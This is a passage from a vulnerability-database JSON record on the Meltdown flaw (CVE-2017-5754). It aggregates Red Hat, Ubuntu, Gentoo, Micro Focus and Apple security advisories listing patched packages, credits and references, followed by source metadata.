6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-headers-2.6.32-696.18.7.el6.ppc64.rpm\nperf-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-headers-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm\nperf-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/speculativeexecution\nhttps://access.redhat.com/security/cve/CVE-2017-5753\nhttps://access.redhat.com/security/cve/CVE-2017-5715\nhttps://access.redhat.com/security/cve/CVE-2017-5754\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O\nOR+iGnoY+cALbsBWKwbmzQM=\n=V4ow\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n==========================================================================\nUbuntu Security Notice USN-3523-1\nJanuary 09, 2018\n\nlinux vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 17.10\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This flaw is known as Meltdown. \n(CVE-2017-5754)\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation\nin the Linux kernel did not properly check the relationship between pointer\nvalues and the BPF stack. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code. \n(CVE-2017-17863)\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation\nin the Linux kernel improperly performed sign extension in some situations. \nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2017-16995)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF)\nimplementation in the Linux kernel contained a branch-pruning logic issue\naround unreachable code. A local attacker could use this to cause a denial\nof service. (CVE-2017-17862)\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation\nin the Linux kernel mishandled pointer data values in some situations. (CVE-2017-17864)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 17.10:\n linux-image-4.13.0-25-generic 4.13.0-25.29\n linux-image-4.13.0-25-lowlatency 4.13.0-25.29\n linux-image-generic 4.13.0.25.26\n linux-image-lowlatency 4.13.0.25.26\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 6.5) - x86_64\n\n3. 7) - noarch, x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201810-06\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Xen: Multiple vulnerabilities\n Date: October 30, 2018\n Bugs: #643350, #655188, #655544, #659442\n ID: 201810-06\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Xen, the worst of which\ncould cause a Denial of Service condition. \n\nBackground\n==========\n\nXen is a bare-metal hypervisor. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 app-emulation/xen \u003c 4.10.1-r2 \u003e= 4.10.1-r2\n 2 app-emulation/xen-tools \u003c 4.10.1-r2 \u003e= 4.10.1-r2\n -------------------------------------------------------------------\n 2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Xen. Please review the\nreferenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Xen users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-emulation/xen-4.10.1-r2\"\n\nAll Xen tools users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=app-emulation/xen-tools-4.10.1-r2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2017-5715\n https://nvd.nist.gov/vuln/detail/CVE-2017-5715\n[ 2 ] CVE-2017-5753\n https://nvd.nist.gov/vuln/detail/CVE-2017-5753\n[ 3 ] CVE-2017-5754\n https://nvd.nist.gov/vuln/detail/CVE-2017-5754\n[ 4 ] CVE-2018-10471\n https://nvd.nist.gov/vuln/detail/CVE-2018-10471\n[ 5 ] CVE-2018-10472\n https://nvd.nist.gov/vuln/detail/CVE-2018-10472\n[ 6 ] CVE-2018-10981\n https://nvd.nist.gov/vuln/detail/CVE-2018-10981\n[ 7 ] CVE-2018-10982\n https://nvd.nist.gov/vuln/detail/CVE-2018-10982\n[ 8 ] CVE-2018-12891\n https://nvd.nist.gov/vuln/detail/CVE-2018-12891\n[ 9 ] CVE-2018-12892\n https://nvd.nist.gov/vuln/detail/CVE-2018-12892\n[ 10 ] CVE-2018-12893\n https://nvd.nist.gov/vuln/detail/CVE-2018-12893\n[ 11 ] CVE-2018-15468\n https://nvd.nist.gov/vuln/detail/CVE-2018-15468\n[ 12 ] CVE-2018-15469\n https://nvd.nist.gov/vuln/detail/CVE-2018-15469\n[ 13 ] CVE-2018-15470\n https://nvd.nist.gov/vuln/detail/CVE-2018-15470\n[ 14 ] CVE-2018-3620\n https://nvd.nist.gov/vuln/detail/CVE-2018-3620\n[ 15 ] CVE-2018-3646\n https://nvd.nist.gov/vuln/detail/CVE-2018-3646\n[ 16 ] CVE-2018-5244\n https://nvd.nist.gov/vuln/detail/CVE-2018-5244\n[ 17 ] CVE-2018-7540\n https://nvd.nist.gov/vuln/detail/CVE-2018-7540\n[ 18 ] CVE-2018-7541\n https://nvd.nist.gov/vuln/detail/CVE-2018-7541\n[ 19 ] CVE-2018-7542\n https://nvd.nist.gov/vuln/detail/CVE-2018-7542\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201810-06\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://softwaresupport.hpe.com/document/-/facetsearch/document/KM03158629\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: KM03158629\nVersion: 2\n\nMFSBGN03802 - Virtualization Performance Viewer (vPV) / Cloud Optimizer,\nLocal Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2018-05-11\nLast Updated: 2018-05-10\n\nPotential Security Impact: Local: Disclosure of Information\n\nSource: Micro Focus, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA potential vulnerability has been identified in 3rd party component used by\nMicro Focus Virtualization Performance Viewer (vPV) / Cloud Optimizer Virtual\nAppliance. The vulnerability could be exploited to Local Disclosure of\nInformation. \n\nReferences:\n\n - CVE-2017-5753\n - CVE-2017-5715\n - CVE-2017-5754\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HP Virtualization Performance Viewer Software - v2.20, v3.0, v3.01,\nv3.02, v3.03\n - HPE Cloud Optimizer - v2.20, v3.0, v3.01, v3.02, v3.03\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n\nRESOLUTION\n\nMicro Focus is actively working with its vendors to address any systems-level\nSpectre and Meltdown impacts.However, if you have immediate concerns or\nquestions regarding CentOS and its approach to Spectre or Meltdown, please\ncontact them directly. \n\nHISTORY\n\nVersion:1 (rev.1) - 12 April 2018 Initial release\n\nVersion:2 (rev.2) - 10 May 2018 Vulnerability Summary\n\n\nThird Party Security Patches: Third party security patches that are to be installed on \nsystems running Micro Focus products should be applied in accordance with the customer\u0027s \npatch management policy. \n\nSupport: For issues about implementing the recommendations of this Security Bulletin, contact normal Micro Focus services support channel. \nFor other issues about the content of this Security Bulletin, send e-mail to cyber-psrt@microfocus.com. \n\nReport: To report a potential security vulnerability for any supported product:\n Web form: https://www.microfocus.com/support-and-services/report-security\n Email: security@microfocus.com\n\nSubscribe:\n To initiate receiving subscriptions for future Micro Focus Security Bulletin alerts via Email, please subscribe here - https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification\n Once you are logged in to the portal, please choose security bulletins under product and document types. \n Please note that you will need to sign in using a Passport account. If you do not have a Passport account yet, you can create one- its free and easy https://cf.passport.softwaregrp.com/hppcf/createuser.do \n\nSecurity Bulletin Archive:\n A list of recently released Security Bulletins is available here: https://softwaresupport.hpe.com/security-vulnerability\n \nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following Micro Focus Security Bulletin. \n\n3P = 3rd Party Software\nGN = Micro Focus General Software\nMU = Multi-Platform Software\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. \nMicro Focus is continually reviewing and enhancing the security features of software products to provide \ncustomers with current secure solutions. \n\n\"Micro Focus is broadly distributing this Security Bulletin in order to bring to the attention of users of the \naffected Micro Focus products the important security information contained in this Bulletin. Micro Focus recommends \nthat all users determine the applicability of this information to their individual situations and take appropriate action. \nMicro Focus does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, \nMicro Focus will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in \nthis Security Bulletin. To the extent permitted by law, Micro Focus disclaims all warranties, either express or \nimplied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\" \n\n\nCopyright 2017 EntIT Software LLC\n\nMicro Focus shall not be liable for technical or editorial errors or omissions contained herein. \nThe information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, \nneither Micro Focus nor its affiliates, subcontractors or suppliers will be liable for incidental, special \nor consequential damages including downtime cost; lost profits; damages relating to the procurement of \nsubstitute products or services; or damages for loss of data, or software restoration. \nThe information in this document is subject to change without notice. Micro Focus and the names of \nMicro Focus products referenced herein are trademarks of Micro Focus in the United States and other countries. \nOther product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2018-1-23-2 macOS High Sierra 10.13.3,\nSecurity Update 2018-001 Sierra,\nand Security Update 2018-001 El Capitan\n\nmacOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and\nSecurity Update 2018-001 El Capitan are now available and address\nthe following:\n\nAudio\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\nImpact: Processing a maliciously crafted audio file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2018-4094: Mingi Cho, MinSik Shin, Seoyoung Kim, Yeongho Lee and\nTaekyoung Kwon of the Information Security Lab, Yonsei University\n\ncurl\nAvailable for: macOS High Sierra 10.13.2\nImpact: Multiple issues in curl\nDescription: An out-of-bounds read issue existed in the curl. This\nissue was addressed through improved bounds checking. \nCVE-2017-8817: found by OSS-Fuzz\n\nIOHIDFamily\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of\nGraz University of Technology; Michael Schwarz of Graz University of\nTechnology; Daniel Gruss of Graz University of Technology;\nThomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus\nTechnology GmbH; Stefan Mangard of Graz University of Technology;\nPaul Kocher; Daniel Genkin of University of Pennsylvania and\nUniversity of Maryland; Yuval Yarom of University of Adelaide and\nData61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nKernel\nAvailable for: macOS High Sierra 10.13.2\nImpact: An application may be able to read restricted memory\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2018-4090: Jann Horn of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.2\nImpact: An application may be able to read restricted memory\nDescription: A race condition was addressed through improved locking. \nCVE-2018-4092: an anonymous researcher\n\nKernel\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2018-4082: Russ Cox of Google\n\nKernel\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A logic issue was addressed with improved validation. \nCVE-2018-4097: Resecurity, Inc. \n\nKernel\nAvailable for: macOS High Sierra 10.13.2\nImpact: An application may be able to read restricted memory\nDescription: A validation issue was addressed with improved input\nsanitization. \nCVE-2018-4093: Jann Horn of Google Project Zero\n\nLinkPresentation\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6.2\nImpact: Processing a maliciously crafted text message may lead to\napplication denial of service\nDescription: A resource exhaustion issue was addressed through\nimproved input validation. \nCVE-2018-4100: Abraham Masri (@cheesecakeufo)\n\nQuartzCore\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nweb content. This issue was addressed through improved input\nvalidation. \nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro\u0027s Zero Day\nInitiative\n\nSandbox\nAvailable for: macOS High Sierra 10.13.2\nImpact: A sandboxed process may be able to circumvent sandbox\nrestrictions\nDescription: An access issue was addressed through additional sandbox\nrestrictions. \nCVE-2018-4091: Alex Gaynor of Mozilla\n\nSecurity\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\nImpact: A certificate may have name constraints applied incorrectly\nDescription: A certificate evaluation issue existed in the handling\nof name constraints. This issue was addressed through improved trust\nevaluation of certificates. \nCVE-2018-4086: Ian Haken of Netflix\n\nWebKit\nAvailable for: macOS High Sierra 10.13.2\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed with\nimproved memory handling. \nCVE-2018-4088: Jeonghoon Shin of Theori\nCVE-2018-4089: Ivan Fratric of Google Project Zero\nCVE-2018-4096: found by OSS-Fuzz\n\nWi-Fi\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: An application may be able to read restricted memory\nDescription: A validation issue was addressed with improved input\nsanitization. \nCVE-2018-4084: Hyung Sup Lee of Minionz, You Chan Lee of Hanyang\nUniversity\n\nInstallation note:\n\nmacOS High Sierra 10.13.3, Security Update 2018-001 Sierra,\nand Security Update 2018-001 El Capitan may be obtained from the\nMac App Store or Apple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlpnnmApHHByb2R1Y3Qt\nc2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEZaqg/8\nDAjzEHmWMZxkSl88DnX/Y9x39DQ1eV6O0Bsg/WQ2r6wZlRDnBOYdJtgJU0I9MjgT\nJjOj6M/l+YkVS3EJHcdQqAZ6RfSSMvIcRieHJ0Lfj6bfohKRLJxuloFVKar3lAsY\nfIdzqlFKqWvPY6Neto2iR7ZhTWDW7QiVwbgSR1fleEWEglWtTeJjL6mff73Mqexh\n7VngVFIicrbjoFD7uY2dctgkP+no3dcFieyRWF/z8OAmAOIkAc/KMqFyj22DBDq5\nhH1j07Eo0RLKMT+nPq3Vgir5JVVR68M4UvDnSDXGHmTRYaM2BT8osWqlehgFQ52F\nJhqAsJsKP1Mc9WZkly8OvBbZHJcIJryTSqytOOZRQuvg6fXHPOezajcpThTntGiI\n/YcmaFIt8bZ8c0GbQXTMY8YCJEHtG3zb/z+Wf0sABfzbtCt48e5CQD5HDsoZyiML\nJ84Sbs1Lb5XFYsdZg5iUFukIJRqYwaf69BUgMmFPTOxkBL/KH7m4BmUtLeiStLYN\nykdW2TQFEbM6ojPL9HrAyho0wdX2/G4jiemAk22fb/XQ6q9+57RyduE/MDiFW93a\n2XcIzxlsRk37ISIPyEkQTF/L/DTMdnhgI+ZIwmaMwU8Hd48MMMg6MIWYctefvnyB\na1pVFFlwHCfxBWYSVI2fkKwExlNNYXCOjGsN7TSBfNc=\n=pc7O\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2017-5754" }, { "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "db": "CERT/CC", "id": "VU#584653" }, { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CNVD", "id": "CNVD-2018-00303" }, { "db": "BID", "id": "102378" }, { "db": "BID", "id": "106128" }, { "db": "VULHUB", "id": "VHN-113957" }, { "db": "PACKETSTORM", "id": "147543" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145793" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145658" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "150083" }, { "db": "PACKETSTORM", "id": "147582" }, { "db": "PACKETSTORM", "id": "146067" } ], "trust": 5.04 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-113957", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-113957" } ] }, "external_ids": { "@context": { "@vocab": 